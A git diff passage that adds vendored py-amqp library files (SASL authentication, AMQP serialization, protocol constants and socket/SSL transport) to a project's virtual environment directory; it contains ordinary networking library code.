'consumer_count'), +) + +basic_return_t = namedtuple( + 'basic_return_t', + ('reply_code', 'reply_text', 'exchange', 'routing_key', 'message'), +) diff --git a/env/Lib/site-packages/amqp/sasl.py b/env/Lib/site-packages/amqp/sasl.py new file mode 100644 index 00000000..407ccb8e --- /dev/null +++ b/env/Lib/site-packages/amqp/sasl.py @@ -0,0 +1,191 @@ +"""SASL mechanisms for AMQP authentication.""" + +import socket +import warnings +from io import BytesIO + +from amqp.serialization import _write_table + + +class SASL: + """The base class for all amqp SASL authentication mechanisms. + + You should sub-class this if you're implementing your own authentication. + """ + + @property + def mechanism(self): + """Return a bytes containing the SASL mechanism name.""" + raise NotImplementedError + + def start(self, connection): + """Return the first response to a SASL challenge as a bytes object.""" + raise NotImplementedError + + +class PLAIN(SASL): + """PLAIN SASL authentication mechanism. + + See https://tools.ietf.org/html/rfc4616 for details + """ + + mechanism = b'PLAIN' + + def __init__(self, username, password): + self.username, self.password = username, password + + __slots__ = ( + "username", + "password", + ) + + def start(self, connection): + if self.username is None or self.password is None: + return NotImplemented + login_response = BytesIO() + login_response.write(b'\0') + login_response.write(self.username.encode('utf-8')) + login_response.write(b'\0') + login_response.write(self.password.encode('utf-8')) + return login_response.getvalue() + + +class AMQPLAIN(SASL): + """AMQPLAIN SASL authentication mechanism. + + This is a non-standard mechanism used by AMQP servers. + """ + + mechanism = b'AMQPLAIN' + + def __init__(self, username, password): + self.username, self.password = username, password + + __slots__ = ( + "username", + "password", + ) + + def start(self, connection): + if self.username is None or self.password is None: + return NotImplemented + login_response = BytesIO() + _write_table({b'LOGIN': self.username, b'PASSWORD': self.password}, + login_response.write, []) + # Skip the length at the beginning + return login_response.getvalue()[4:] + + +def _get_gssapi_mechanism(): + try: + import gssapi + import gssapi.raw.misc # Fail if the old python-gssapi is installed + except ImportError: + class FakeGSSAPI(SASL): + """A no-op SASL mechanism for when gssapi isn't available.""" + + mechanism = None + + def __init__(self, client_name=None, service=b'amqp', + rdns=False, fail_soft=False): + if not fail_soft: + raise NotImplementedError( + "You need to install the `gssapi` module for GSSAPI " + "SASL support") + + def start(self): # pragma: no cover + return NotImplemented + return FakeGSSAPI + else: + class GSSAPI(SASL): + """GSSAPI SASL authentication mechanism. + + See https://tools.ietf.org/html/rfc4752 for details + """ + + mechanism = b'GSSAPI' + + def __init__(self, client_name=None, service=b'amqp', + rdns=False, fail_soft=False): + if client_name and not isinstance(client_name, bytes): + client_name = client_name.encode('ascii') + self.client_name = client_name + self.fail_soft = fail_soft + self.service = service + self.rdns = rdns + + __slots__ = ( + "client_name", + "fail_soft", + "service", + "rdns" + ) + + def get_hostname(self, connection): + sock = connection.transport.sock + if self.rdns and sock.family in (socket.AF_INET, + socket.AF_INET6): + peer = sock.getpeername() + hostname, _, _ = socket.gethostbyaddr(peer[0]) + else: + hostname = connection.transport.host + if not isinstance(hostname, bytes): + hostname = hostname.encode('ascii') + return hostname + + def start(self, connection): + try: + if self.client_name: + creds = gssapi.Credentials( + name=gssapi.Name(self.client_name)) + else: + creds = None + hostname = self.get_hostname(connection) + name = gssapi.Name(b'@'.join([self.service, hostname]), + gssapi.NameType.hostbased_service) + context = gssapi.SecurityContext(name=name, creds=creds) + return context.step(None) + except gssapi.raw.misc.GSSError: + if self.fail_soft: + return NotImplemented + else: + raise + return GSSAPI + + +GSSAPI = _get_gssapi_mechanism() + + +class EXTERNAL(SASL): + """EXTERNAL SASL mechanism. + + Enables external authentication, i.e. not handled through this protocol. + Only passes 'EXTERNAL' as authentication mechanism, but no further + authentication data. + """ + + mechanism = b'EXTERNAL' + + def start(self, connection): + return b'' + + +class RAW(SASL): + """A generic custom SASL mechanism. + + This mechanism takes a mechanism name and response to send to the server, + so can be used for simple custom authentication schemes. + """ + + mechanism = None + + def __init__(self, mechanism, response): + assert isinstance(mechanism, bytes) + assert isinstance(response, bytes) + self.mechanism, self.response = mechanism, response + warnings.warn("Passing login_method and login_response to Connection " + "is deprecated. Please implement a SASL subclass " + "instead.", DeprecationWarning) + + def start(self, connection): + return self.response diff --git a/env/Lib/site-packages/amqp/serialization.py b/env/Lib/site-packages/amqp/serialization.py new file mode 100644 index 00000000..1f2f8e2d --- /dev/null +++ b/env/Lib/site-packages/amqp/serialization.py @@ -0,0 +1,582 @@ +"""Convert between bytestreams and higher-level AMQP types. + +2007-11-05 Barry Pederson + +""" +# Copyright (C) 2007 Barry Pederson + +import calendar +from datetime import datetime +from decimal import Decimal +from io import BytesIO +from struct import pack, unpack_from + +from .exceptions import FrameSyntaxError +from .spec import Basic +from .utils import bytes_to_str as pstr_t +from .utils import str_to_bytes + +ILLEGAL_TABLE_TYPE = """\ + Table type {0!r} not handled by amqp. +""" + +ILLEGAL_TABLE_TYPE_WITH_KEY = """\ +Table type {0!r} for key {1!r} not handled by amqp. [value: {2!r}] +""" + +ILLEGAL_TABLE_TYPE_WITH_VALUE = """\ + Table type {0!r} not handled by amqp. [value: {1!r}] +""" + + +def _read_item(buf, offset): + ftype = chr(buf[offset]) + offset += 1 + + # 'S': long string + if ftype == 'S': + slen, = unpack_from('>I', buf, offset) + offset += 4 + try: + val = pstr_t(buf[offset:offset + slen]) + except UnicodeDecodeError: + val = buf[offset:offset + slen] + + offset += slen + # 's': short string + elif ftype == 's': + slen, = unpack_from('>B', buf, offset) + offset += 1 + val = pstr_t(buf[offset:offset + slen]) + offset += slen + # 'x': Bytes Array + elif ftype == 'x': + blen, = unpack_from('>I', buf, offset) + offset += 4 + val = buf[offset:offset + blen] + offset += blen + # 'b': short-short int + elif ftype == 'b': + val, = unpack_from('>B', buf, offset) + offset += 1 + # 'B': short-short unsigned int + elif ftype == 'B': + val, = unpack_from('>b', buf, offset) + offset += 1 + # 'U': short int + elif ftype == 'U': + val, = unpack_from('>h', buf, offset) + offset += 2 + # 'u': short unsigned int + elif ftype == 'u': + val, = unpack_from('>H', buf, offset) + offset += 2 + # 'I': long int + elif ftype == 'I': + val, = unpack_from('>i', buf, offset) + offset += 4 + # 'i': long unsigned int + elif ftype == 'i': + val, = unpack_from('>I', buf, offset) + offset += 4 + # 'L': long long int + elif ftype == 'L': + val, = unpack_from('>q', buf, offset) + offset += 8 + # 'l': long long unsigned int + elif ftype == 'l': + val, = unpack_from('>Q', buf, offset) + offset += 8 + # 'f': float + elif ftype == 'f': + val, = unpack_from('>f', buf, offset) + offset += 4 + # 'd': double + elif ftype == 'd': + val, = unpack_from('>d', buf, offset) + offset += 8 + # 'D': decimal + elif ftype == 'D': + d, = unpack_from('>B', buf, offset) + offset += 1 + n, = unpack_from('>i', buf, offset) + offset += 4 + val = Decimal(n) / Decimal(10 ** d) + # 'F': table + elif ftype == 'F': + tlen, = unpack_from('>I', buf, offset) + offset += 4 + limit = offset + tlen + val = {} + while offset < limit: + keylen, = unpack_from('>B', buf, offset) + offset += 1 + key = pstr_t(buf[offset:offset + keylen]) + offset += keylen + val[key], offset = _read_item(buf, offset) + # 'A': array + elif ftype == 'A': + alen, = unpack_from('>I', buf, offset) + offset += 4 + limit = offset + alen + val = [] + while offset < limit: + v, offset = _read_item(buf, offset) + val.append(v) + # 't' (bool) + elif ftype == 't': + val, = unpack_from('>B', buf, offset) + val = bool(val) + offset += 1 + # 'T': timestamp + elif ftype == 'T': + val, = unpack_from('>Q', buf, offset) + offset += 8 + val = datetime.utcfromtimestamp(val) + # 'V': void + elif ftype == 'V': + val = None + else: + raise FrameSyntaxError( + 'Unknown value in table: {!r} ({!r})'.format( + ftype, type(ftype))) + return val, offset + + +def loads(format, buf, offset): + """Deserialize amqp format. + + bit = b + octet = o + short = B + long = l + long long = L + float = f + shortstr = s + longstr = S + table = F + array = A + timestamp = T + """ + bitcount = bits = 0 + + values = [] + append = values.append + format = pstr_t(format) + + for p in format: + if p == 'b': + if not bitcount: + bits = ord(buf[offset:offset + 1]) + offset += 1 + bitcount = 8 + val = (bits & 1) == 1 + bits >>= 1 + bitcount -= 1 + elif p == 'o': + bitcount = bits = 0 + val, = unpack_from('>B', buf, offset) + offset += 1 + elif p == 'B': + bitcount = bits = 0 + val, = unpack_from('>H', buf, offset) + offset += 2 + elif p == 'l': + bitcount = bits = 0 + val, = unpack_from('>I', buf, offset) + offset += 4 + elif p == 'L': + bitcount = bits = 0 + val, = unpack_from('>Q', buf, offset) + offset += 8 + elif p == 'f': + bitcount = bits = 0 + val, = unpack_from('>f', buf, offset) + offset += 4 + elif p == 's': + bitcount = bits = 0 + slen, = unpack_from('B', buf, offset) + offset += 1 + val = buf[offset:offset + slen].decode('utf-8', 'surrogatepass') + offset += slen + elif p == 'S': + bitcount = bits = 0 + slen, = unpack_from('>I', buf, offset) + offset += 4 + val = buf[offset:offset + slen].decode('utf-8', 'surrogatepass') + offset += slen + elif p == 'x': + blen, = unpack_from('>I', buf, offset) + offset += 4 + val = buf[offset:offset + blen] + offset += blen + elif p == 'F': + bitcount = bits = 0 + tlen, = unpack_from('>I', buf, offset) + offset += 4 + limit = offset + tlen + val = {} + while offset < limit: + keylen, = unpack_from('>B', buf, offset) + offset += 1 + key = pstr_t(buf[offset:offset + keylen]) + offset += keylen + val[key], offset = _read_item(buf, offset) + elif p == 'A': + bitcount = bits = 0 + alen, = unpack_from('>I', buf, offset) + offset += 4 + limit = offset + alen + val = [] + while offset < limit: + aval, offset = _read_item(buf, offset) + val.append(aval) + elif p == 'T': + bitcount = bits = 0 + val, = unpack_from('>Q', buf, offset) + offset += 8 + val = datetime.utcfromtimestamp(val) + else: + raise FrameSyntaxError(ILLEGAL_TABLE_TYPE.format(p)) + append(val) + return values, offset + + +def _flushbits(bits, write): + if bits: + write(pack('B' * len(bits), *bits)) + bits[:] = [] + return 0 + + +def dumps(format, values): + """Serialize AMQP arguments. + + Notes: + bit = b + octet = o + short = B + long = l + long long = L + shortstr = s + longstr = S + byte array = x + table = F + array = A + """ + bitcount = 0 + bits = [] + out = BytesIO() + write = out.write + + format = pstr_t(format) + + for i, val in enumerate(values): + p = format[i] + if p == 'b': + val = 1 if val else 0 + shift = bitcount % 8 + if shift == 0: + bits.append(0) + bits[-1] |= (val << shift) + bitcount += 1 + elif p == 'o': + bitcount = _flushbits(bits, write) + write(pack('B', val)) + elif p == 'B': + bitcount = _flushbits(bits, write) + write(pack('>H', int(val))) + elif p == 'l': + bitcount = _flushbits(bits, write) + write(pack('>I', val)) + elif p == 'L': + bitcount = _flushbits(bits, write) + write(pack('>Q', val)) + elif p == 'f': + bitcount = _flushbits(bits, write) + write(pack('>f', val)) + elif p == 's': + val = val or '' + bitcount = _flushbits(bits, write) + if isinstance(val, str): + val = val.encode('utf-8', 'surrogatepass') + write(pack('B', len(val))) + write(val) + elif p == 'S' or p == 'x': + val = val or '' + bitcount = _flushbits(bits, write) + if isinstance(val, str): + val = val.encode('utf-8', 'surrogatepass') + write(pack('>I', len(val))) + write(val) + elif p == 'F': + bitcount = _flushbits(bits, write) + _write_table(val or {}, write, bits) + elif p == 'A': + bitcount = _flushbits(bits, write) + _write_array(val or [], write, bits) + elif p == 'T': + write(pack('>Q', int(calendar.timegm(val.utctimetuple())))) + _flushbits(bits, write) + + return out.getvalue() + + +def _write_table(d, write, bits): + out = BytesIO() + twrite = out.write + for k, v in d.items(): + if isinstance(k, str): + k = k.encode('utf-8', 'surrogatepass') + twrite(pack('B', len(k))) + twrite(k) + try: + _write_item(v, twrite, bits) + except ValueError: + raise FrameSyntaxError( + ILLEGAL_TABLE_TYPE_WITH_KEY.format(type(v), k, v)) + table_data = out.getvalue() + write(pack('>I', len(table_data))) + write(table_data) + + +def _write_array(list_, write, bits): + out = BytesIO() + awrite = out.write + for v in list_: + try: + _write_item(v, awrite, bits) + except ValueError: + raise FrameSyntaxError( + ILLEGAL_TABLE_TYPE_WITH_VALUE.format(type(v), v)) + array_data = out.getvalue() + write(pack('>I', len(array_data))) + write(array_data) + + +def _write_item(v, write, bits): + if isinstance(v, (str, bytes)): + if isinstance(v, str): + v = v.encode('utf-8', 'surrogatepass') + write(pack('>cI', b'S', len(v))) + write(v) + elif isinstance(v, bool): + write(pack('>cB', b't', int(v))) + elif isinstance(v, float): + write(pack('>cd', b'd', v)) + elif isinstance(v, int): + if v > 2147483647 or v < -2147483647: + write(pack('>cq', b'L', v)) + else: + write(pack('>ci', b'I', v)) + elif isinstance(v, Decimal): + sign, digits, exponent = v.as_tuple() + v = 0 + for d in digits: + v = (v * 10) + d + if sign: + v = -v + write(pack('>cBi', b'D', -exponent, v)) + elif isinstance(v, datetime): + write( + pack('>cQ', b'T', int(calendar.timegm(v.utctimetuple())))) + elif isinstance(v, dict): + write(b'F') + _write_table(v, write, bits) + elif isinstance(v, (list, tuple)): + write(b'A') + _write_array(v, write, bits) + elif v is None: + write(b'V') + else: + raise ValueError() + + +def decode_properties_basic(buf, offset): + """Decode basic properties.""" + properties = {} + + flags, = unpack_from('>H', buf, offset) + offset += 2 + + if flags & 0x8000: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['content_type'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x4000: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['content_encoding'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x2000: + _f, offset = loads('F', buf, offset) + properties['application_headers'], = _f + if flags & 0x1000: + properties['delivery_mode'], = unpack_from('>B', buf, offset) + offset += 1 + if flags & 0x0800: + properties['priority'], = unpack_from('>B', buf, offset) + offset += 1 + if flags & 0x0400: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['correlation_id'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0200: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['reply_to'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0100: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['expiration'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0080: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['message_id'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0040: + properties['timestamp'], = unpack_from('>Q', buf, offset) + offset += 8 + if flags & 0x0020: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['type'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0010: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['user_id'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0008: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['app_id'] = pstr_t(buf[offset:offset + slen]) + offset += slen + if flags & 0x0004: + slen, = unpack_from('>B', buf, offset) + offset += 1 + properties['cluster_id'] = pstr_t(buf[offset:offset + slen]) + offset += slen + return properties, offset + + +PROPERTY_CLASSES = { + Basic.CLASS_ID: decode_properties_basic, +} + + +class GenericContent: + """Abstract base class for AMQP content. + + Subclasses should override the PROPERTIES attribute. + """ + + CLASS_ID = None + PROPERTIES = [('dummy', 's')] + + def __init__(self, frame_method=None, frame_args=None, **props): + self.frame_method = frame_method + self.frame_args = frame_args + + self.properties = props + self._pending_chunks = [] + self.body_received = 0 + self.body_size = 0 + self.ready = False + + __slots__ = ( + "frame_method", + "frame_args", + "properties", + "_pending_chunks", + "body_received", + "body_size", + "ready", + # adding '__dict__' to get dynamic assignment + "__dict__", + "__weakref__", + ) + + def __getattr__(self, name): + # Look for additional properties in the 'properties' + # dictionary, and if present - the 'delivery_info' dictionary. + if name == '__setstate__': + # Allows pickling/unpickling to work + raise AttributeError('__setstate__') + + if name in self.properties: + return self.properties[name] + raise AttributeError(name) + + def _load_properties(self, class_id, buf, offset): + """Load AMQP properties. + + Given the raw bytes containing the property-flags and property-list + from a content-frame-header, parse and insert into a dictionary + stored in this object as an attribute named 'properties'. + """ + # Read 16-bit shorts until we get one with a low bit set to zero + props, offset = PROPERTY_CLASSES[class_id](buf, offset) + self.properties = props + return offset + + def _serialize_properties(self): + """Serialize AMQP properties. + + Serialize the 'properties' attribute (a dictionary) into + the raw bytes making up a set of property flags and a + property list, suitable for putting into a content frame header. + """ + shift = 15 + flag_bits = 0 + flags = [] + sformat, svalues = [], [] + props = self.properties + for key, proptype in self.PROPERTIES: + val = props.get(key, None) + if val is not None: + if shift == 0: + flags.append(flag_bits) + flag_bits = 0 + shift = 15 + + flag_bits |= (1 << shift) + if proptype != 'bit': + sformat.append(str_to_bytes(proptype)) + svalues.append(val) + + shift -= 1 + flags.append(flag_bits) + result = BytesIO() + write = result.write + for flag_bits in flags: + write(pack('>H', flag_bits)) + write(dumps(b''.join(sformat), svalues)) + + return result.getvalue() + + def inbound_header(self, buf, offset=0): + class_id, self.body_size = unpack_from('>HxxQ', buf, offset) + offset += 12 + self._load_properties(class_id, buf, offset) + if not self.body_size: + self.ready = True + return offset + + def inbound_body(self, buf): + chunks = self._pending_chunks + self.body_received += len(buf) + if self.body_received >= self.body_size: + if chunks: + chunks.append(buf) + self.body = bytes().join(chunks) + chunks[:] = [] + else: + self.body = buf + self.ready = True + else: + chunks.append(buf) diff --git a/env/Lib/site-packages/amqp/spec.py b/env/Lib/site-packages/amqp/spec.py new file mode 100644 index 00000000..2a1169e1 --- /dev/null +++ b/env/Lib/site-packages/amqp/spec.py @@ -0,0 +1,121 @@ +"""AMQP Spec.""" + +from collections import namedtuple + +method_t = namedtuple('method_t', ('method_sig', 'args', 'content')) + + +def method(method_sig, args=None, content=False): + """Create amqp method specification tuple.""" + return method_t(method_sig, args, content) + + +class Connection: + """AMQ Connection class.""" + + CLASS_ID = 10 + + Start = (10, 10) + StartOk = (10, 11) + Secure = (10, 20) + SecureOk = (10, 21) + Tune = (10, 30) + TuneOk = (10, 31) + Open = (10, 40) + OpenOk = (10, 41) + Close = (10, 50) + CloseOk = (10, 51) + Blocked = (10, 60) + Unblocked = (10, 61) + + +class Channel: + """AMQ Channel class.""" + + CLASS_ID = 20 + + Open = (20, 10) + OpenOk = (20, 11) + Flow = (20, 20) + FlowOk = (20, 21) + Close = (20, 40) + CloseOk = (20, 41) + + +class Exchange: + """AMQ Exchange class.""" + + CLASS_ID = 40 + + Declare = (40, 10) + DeclareOk = (40, 11) + Delete = (40, 20) + DeleteOk = (40, 21) + Bind = (40, 30) + BindOk = (40, 31) + Unbind = (40, 40) + UnbindOk = (40, 51) + + +class Queue: + """AMQ Queue class.""" + + CLASS_ID = 50 + + Declare = (50, 10) + DeclareOk = (50, 11) + Bind = (50, 20) + BindOk = (50, 21) + Purge = (50, 30) + PurgeOk = (50, 31) + Delete = (50, 40) + DeleteOk = (50, 41) + Unbind = (50, 50) + UnbindOk = (50, 51) + + +class Basic: + """AMQ Basic class.""" + + CLASS_ID = 60 + + Qos = (60, 10) + QosOk = (60, 11) + Consume = (60, 20) + ConsumeOk = (60, 21) + Cancel = (60, 30) + CancelOk = (60, 31) + Publish = (60, 40) + Return = (60, 50) + Deliver = (60, 60) + Get = (60, 70) + GetOk = (60, 71) + GetEmpty = (60, 72) + Ack = (60, 80) + Nack = (60, 120) + Reject = (60, 90) + RecoverAsync = (60, 100) + Recover = (60, 110) + RecoverOk = (60, 111) + + +class Confirm: + """AMQ Confirm class.""" + + CLASS_ID = 85 + + Select = (85, 10) + SelectOk = (85, 11) + + +class Tx: + """AMQ Tx class.""" + + CLASS_ID = 90 + + Select = (90, 10) + SelectOk = (90, 11) + Commit = (90, 20) + CommitOk = (90, 21) + Rollback = (90, 30) + RollbackOk = (90, 31) diff --git a/env/Lib/site-packages/amqp/transport.py b/env/Lib/site-packages/amqp/transport.py new file mode 100644 index 00000000..2761f094 --- /dev/null +++ b/env/Lib/site-packages/amqp/transport.py @@ -0,0 +1,674 @@ +"""Transport implementation.""" +# Copyright (C) 2009 Barry Pederson + +import errno +import os +import re +import socket +import ssl +from contextlib import contextmanager +from ssl import SSLError +from struct import pack, unpack + +from .exceptions import UnexpectedFrame +from .platform import KNOWN_TCP_OPTS, SOL_TCP +from .utils import set_cloexec + +_UNAVAIL = {errno.EAGAIN, errno.EINTR, errno.ENOENT, errno.EWOULDBLOCK} + +AMQP_PORT = 5672 + +EMPTY_BUFFER = bytes() + +SIGNED_INT_MAX = 0x7FFFFFFF + +# Yes, Advanced Message Queuing Protocol Protocol is redundant +AMQP_PROTOCOL_HEADER = b'AMQP\x00\x00\x09\x01' + +# Match things like: [fe80::1]:5432, from RFC 2732 +IPV6_LITERAL = re.compile(r'\[([\.0-9a-f:]+)\](?::(\d+))?') + +DEFAULT_SOCKET_SETTINGS = { + 'TCP_NODELAY': 1, + 'TCP_USER_TIMEOUT': 1000, + 'TCP_KEEPIDLE': 60, + 'TCP_KEEPINTVL': 10, + 'TCP_KEEPCNT': 9, +} + + +def to_host_port(host, default=AMQP_PORT): + """Convert hostname:port string to host, port tuple.""" + port = default + m = IPV6_LITERAL.match(host) + if m: + host = m.group(1) + if m.group(2): + port = int(m.group(2)) + else: + if ':' in host: + host, port = host.rsplit(':', 1) + port = int(port) + return host, port + + +class _AbstractTransport: + """Common superclass for TCP and SSL transports. + + PARAMETERS: + host: str + + Broker address in format ``HOSTNAME:PORT``. + + connect_timeout: int + + Timeout of creating new connection. + + read_timeout: int + + sets ``SO_RCVTIMEO`` parameter of socket. + + write_timeout: int + + sets ``SO_SNDTIMEO`` parameter of socket. + + socket_settings: dict + + dictionary containing `optname` and ``optval`` passed to + ``setsockopt(2)``. + + raise_on_initial_eintr: bool + + when True, ``socket.timeout`` is raised + when exception is received during first read. See ``_read()`` for + details. + """ + + def __init__(self, host, connect_timeout=None, + read_timeout=None, write_timeout=None, + socket_settings=None, raise_on_initial_eintr=True, **kwargs): + self.connected = False + self.sock = None + self.raise_on_initial_eintr = raise_on_initial_eintr + self._read_buffer = EMPTY_BUFFER + self.host, self.port = to_host_port(host) + self.connect_timeout = connect_timeout + self.read_timeout = read_timeout + self.write_timeout = write_timeout + self.socket_settings = socket_settings + + __slots__ = ( + "connection", + "sock", + "raise_on_initial_eintr", + "_read_buffer", + "host", + "port", + "connect_timeout", + "read_timeout", + "write_timeout", + "socket_settings", + # adding '__dict__' to get dynamic assignment + "__dict__", + "__weakref__", + ) + + def __repr__(self): + if self.sock: + src = f'{self.sock.getsockname()[0]}:{self.sock.getsockname()[1]}' + dst = f'{self.sock.getpeername()[0]}:{self.sock.getpeername()[1]}' + return f'<{type(self).__name__}: {src} -> {dst} at {id(self):#x}>' + else: + return f'<{type(self).__name__}: (disconnected) at {id(self):#x}>' + + def connect(self): + try: + # are we already connected? + if self.connected: + return + self._connect(self.host, self.port, self.connect_timeout) + self._init_socket( + self.socket_settings, self.read_timeout, self.write_timeout, + ) + # we've sent the banner; signal connect + # EINTR, EAGAIN, EWOULDBLOCK would signal that the banner + # has _not_ been sent + self.connected = True + except (OSError, SSLError): + # if not fully connected, close socket, and reraise error + if self.sock and not self.connected: + self.sock.close() + self.sock = None + raise + + @contextmanager + def having_timeout(self, timeout): + if timeout is None: + yield self.sock + else: + sock = self.sock + prev = sock.gettimeout() + if prev != timeout: + sock.settimeout(timeout) + try: + yield self.sock + except SSLError as exc: + if 'timed out' in str(exc): + # http://bugs.python.org/issue10272 + raise socket.timeout() + elif 'The operation did not complete' in str(exc): + # Non-blocking SSL sockets can throw SSLError + raise socket.timeout() + raise + except OSError as exc: + if exc.errno == errno.EWOULDBLOCK: + raise socket.timeout() + raise + finally: + if timeout != prev: + sock.settimeout(prev) + + def _connect(self, host, port, timeout): + entries = socket.getaddrinfo( + host, port, socket.AF_UNSPEC, socket.SOCK_STREAM, SOL_TCP, + ) + for i, res in enumerate(entries): + af, socktype, proto, canonname, sa = res + try: + self.sock = socket.socket(af, socktype, proto) + try: + set_cloexec(self.sock, True) + except NotImplementedError: + pass + self.sock.settimeout(timeout) + self.sock.connect(sa) + except socket.error: + if self.sock: + self.sock.close() + self.sock = None + if i + 1 >= len(entries): + raise + else: + break + + def _init_socket(self, socket_settings, read_timeout, write_timeout): + self.sock.settimeout(None) # set socket back to blocking mode + self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) + self._set_socket_options(socket_settings) + + # set socket timeouts + for timeout, interval in ((socket.SO_SNDTIMEO, write_timeout), + (socket.SO_RCVTIMEO, read_timeout)): + if interval is not None: + sec = int(interval) + usec = int((interval - sec) * 1000000) + self.sock.setsockopt( + socket.SOL_SOCKET, timeout, + pack('ll', sec, usec), + ) + self._setup_transport() + + self._write(AMQP_PROTOCOL_HEADER) + + def _get_tcp_socket_defaults(self, sock): + tcp_opts = {} + for opt in KNOWN_TCP_OPTS: + enum = None + if opt == 'TCP_USER_TIMEOUT': + try: + from socket import TCP_USER_TIMEOUT as enum + except ImportError: + # should be in Python 3.6+ on Linux. + enum = 18 + elif hasattr(socket, opt): + enum = getattr(socket, opt) + + if enum: + if opt in DEFAULT_SOCKET_SETTINGS: + tcp_opts[enum] = DEFAULT_SOCKET_SETTINGS[opt] + elif hasattr(socket, opt): + tcp_opts[enum] = sock.getsockopt( + SOL_TCP, getattr(socket, opt)) + return tcp_opts + + def _set_socket_options(self, socket_settings): + tcp_opts = self._get_tcp_socket_defaults(self.sock) + if socket_settings: + tcp_opts.update(socket_settings) + for opt, val in tcp_opts.items(): + self.sock.setsockopt(SOL_TCP, opt, val) + + def _read(self, n, initial=False): + """Read exactly n bytes from the peer.""" + raise NotImplementedError('Must be overridden in subclass') + + def _setup_transport(self): + """Do any additional initialization of the class.""" + pass + + def _shutdown_transport(self): + """Do any preliminary work in shutting down the connection.""" + pass + + def _write(self, s): + """Completely write a string to the peer.""" + raise NotImplementedError('Must be overridden in subclass') + + def close(self): + if self.sock is not None: + try: + self._shutdown_transport() + except OSError: + pass + + # Call shutdown first to make sure that pending messages + # reach the AMQP broker if the program exits after + # calling this method. + try: + self.sock.shutdown(socket.SHUT_RDWR) + except OSError: + pass + + try: + self.sock.close() + except OSError: + pass + self.sock = None + self.connected = False + + def read_frame(self, unpack=unpack): + """Parse AMQP frame. + + Frame has following format:: + + 0 1 3 7 size+7 size+8 + +------+---------+---------+ +-------------+ +-----------+ + | type | channel | size | | payload | | frame-end | + +------+---------+---------+ +-------------+ +-----------+ + octet short long 'size' octets octet + + """ + read = self._read + read_frame_buffer = EMPTY_BUFFER + try: + frame_header = read(7, True) + read_frame_buffer += frame_header + frame_type, channel, size = unpack('>BHI', frame_header) + # >I is an unsigned int, but the argument to sock.recv is signed, + # so we know the size can be at most 2 * SIGNED_INT_MAX + if size > SIGNED_INT_MAX: + part1 = read(SIGNED_INT_MAX) + + try: + part2 = read(size - SIGNED_INT_MAX) + except (socket.timeout, OSError, SSLError): + # In case this read times out, we need to make sure to not + # lose part1 when we retry the read + read_frame_buffer += part1 + raise + + payload = b''.join([part1, part2]) + else: + payload = read(size) + read_frame_buffer += payload + frame_end = ord(read(1)) + except socket.timeout: + self._read_buffer = read_frame_buffer + self._read_buffer + raise + except (OSError, SSLError) as exc: + if ( + isinstance(exc, socket.error) and os.name == 'nt' + and exc.errno == errno.EWOULDBLOCK # noqa + ): + # On windows we can get a read timeout with a winsock error + # code instead of a proper socket.timeout() error, see + # https://github.com/celery/py-amqp/issues/320 + self._read_buffer = read_frame_buffer + self._read_buffer + raise socket.timeout() + + if isinstance(exc, SSLError) and 'timed out' in str(exc): + # Don't disconnect for ssl read time outs + # http://bugs.python.org/issue10272 + self._read_buffer = read_frame_buffer + self._read_buffer + raise socket.timeout() + + if exc.errno not in _UNAVAIL: + self.connected = False + raise + # frame-end octet must contain '\xce' value + if frame_end == 206: + return frame_type, channel, payload + else: + raise UnexpectedFrame( + f'Received frame_end {frame_end:#04x} while expecting 0xce') + + def write(self, s): + try: + self._write(s) + except socket.timeout: + raise + except OSError as exc: + if exc.errno not in _UNAVAIL: + self.connected = False + raise + + +class SSLTransport(_AbstractTransport): + """Transport that works over SSL. + + PARAMETERS: + host: str + + Broker address in format ``HOSTNAME:PORT``. + + connect_timeout: int + + Timeout of creating new connection. + + ssl: bool|dict + + parameters of TLS subsystem. + - when ``ssl`` is not dictionary, defaults of TLS are used + - otherwise: + - if ``ssl`` dictionary contains ``context`` key, + :attr:`~SSLTransport._wrap_context` is used for wrapping + socket. ``context`` is a dictionary passed to + :attr:`~SSLTransport._wrap_context` as context parameter. + All others items from ``ssl`` argument are passed as + ``sslopts``. + - if ``ssl`` dictionary does not contain ``context`` key, + :attr:`~SSLTransport._wrap_socket_sni` is used for + wrapping socket. All items in ``ssl`` argument are + passed to :attr:`~SSLTransport._wrap_socket_sni` as + parameters. + + kwargs: + + additional arguments of + :class:`~amqp.transport._AbstractTransport` class + """ + + def __init__(self, host, connect_timeout=None, ssl=None, **kwargs): + self.sslopts = ssl if isinstance(ssl, dict) else {} + self._read_buffer = EMPTY_BUFFER + super().__init__( + host, connect_timeout=connect_timeout, **kwargs) + + __slots__ = ( + "sslopts", + ) + + def _setup_transport(self): + """Wrap the socket in an SSL object.""" + self.sock = self._wrap_socket(self.sock, **self.sslopts) + self.sock.do_handshake() + self._quick_recv = self.sock.read + + def _wrap_socket(self, sock, context=None, **sslopts): + if context: + return self._wrap_context(sock, sslopts, **context) + return self._wrap_socket_sni(sock, **sslopts) + + def _wrap_context(self, sock, sslopts, check_hostname=None, **ctx_options): + """Wrap socket without SNI headers. + + PARAMETERS: + sock: socket.socket + + Socket to be wrapped. + + sslopts: dict + + Parameters of :attr:`ssl.SSLContext.wrap_socket`. + + check_hostname + + Whether to match the peer cert’s hostname. See + :attr:`ssl.SSLContext.check_hostname` for details. + + ctx_options + + Parameters of :attr:`ssl.create_default_context`. + """ + ctx = ssl.create_default_context(**ctx_options) + ctx.check_hostname = check_hostname + return ctx.wrap_socket(sock, **sslopts) + + def _wrap_socket_sni(self, sock, keyfile=None, certfile=None, + server_side=False, cert_reqs=None, 